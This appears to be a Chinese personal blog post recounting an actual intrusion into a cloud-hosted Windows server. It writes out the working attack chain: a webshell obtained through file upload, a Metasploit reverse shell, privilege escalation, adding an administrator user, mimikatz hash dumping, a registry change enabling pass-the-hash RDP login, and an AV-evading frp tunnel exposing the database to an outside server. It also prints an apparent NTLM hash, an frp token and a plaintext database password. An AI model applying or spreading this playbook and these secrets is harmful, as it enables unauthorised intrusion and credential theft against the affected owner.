Hne|Blog
记一次Windows内网探索
编辑
2023-08-22
渗透-实战
00
请注意,本文编写于 806 天前,最后修改于 476 天前,其中某些信息可能已经过时。

目录

添加用户
一:hash传递登录到admin
修改目标注册表,开启hash传递
利用 mimikatz 输入下面命令
!image.png
二:上传免杀的frpc上去,将目标1433端口代理出来,使用navicat连接
frpc配置如下

目标ip

.x.x.x 阿里云服务器 某小程序利用文件上传拿到webshell,权限很低

image.png 考虑提权 借用哥斯拉的反弹shell ,使用msf来提权

root@kali:~# msfconsole 
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 0.0.0.0
msf5 exploit(multi/handler) > set lport 444	4
msf5 exploit(multi/handler) > run
meterpreter >

image.png getsystem 直接提权 getuid 查看当前权限 image.png 本来试图添加3389用户的

添加用户

abap
net user test Pass0822.. /add  添加用户名为name,密码为pass
net localgroup Administrators test /add  将用户名为uname的用户添加到管理员组
net user test /del 删除uname用户

可惜一直失败,猜测杀软拦截(后文有解释),试图抓取hash 使用msf的load kiwi

php
kiwi_cmd sekurlsa::logonpasswords

image.png 试图解hash失败了,据说2008以上的服务器都无法直接获取明文密码,这个时候其实就可以考虑使用msf获得的高权限来开启注册表,进行hash传递登陆 image.png 尝试使用gotohttp上线 image.png 发现仍然需要密码 ,失败

使用msf执行免杀的cs马上线成功,开启vnc 黑屏,两眼一黑 在CS重新尝试添加用户失败,回显发现是因为密码策略问题,为此绕了一大圈 image.png 牢记 chcp 65001 如下msf就不会出现乱码 image.png 使用test连接上去了,可惜不能直接打开sqlserver image.png 两个想法 一:hash传递登录到admin 二:上传免杀的frpc上去,将目标1433端口代理出来,使用navicat连接

一:hash传递登录到admin

修改目标注册表,开启hash传递

REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

image.png

REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin"

image.png

利用 mimikatz 输入下面命令

privilege::debug

sekurlsa::pth /user:administrator /domain:47.97.90.1 /ntlm:d23ac23671cda20a435ee35fd48464a8 "/run:mstsc.exe /restrictedadmin"

image.png

成功登录 image.png

二:上传免杀的frpc上去,将目标1433端口代理出来,使用navicat连接

frpc配置如下

[common]
server_addr = 172.245.17.142
server_port = 8008
token = SCJTxrVIJZWcfiND

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 1433
remote_port = 1433

将目标数据库代理出来,配合从账号密码使用navicat连接 image.png

#从config网站配置文件中翻到数据库密码

<?xml version="1.0" encoding="utf-8" ?>
<configuration>
    <configSections>
    </configSections>
    <connectionStrings>
        <add name="WeiXinAdminForm.Properties.Settings.WeiXinAdminConnectionString"
            connectionString="Data Source=.;Initial Catalog=WeiXinAdmin;Persist Security Info=True;User ID=changex;Password=Wzl880626..."
            providerName="System.Data.SqlClient" />
    </connectionStrings>
    <startup> 
        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />
    </startup>
</configuration>

如果一个男人懦弱逃避/没有主见(主体认知全是外部规则灌输的结果)/从众。 我想他 一辈子都没有被善待/培养过。 所有人都知道对于一个雄性,这种状态约等于报废了,不 管怎么主观合理化都无法改变这个客观现实。 但是我很同情他,因为我知道,只有最恶毒 的改造,才会产生最悲催的结局。 --每日一句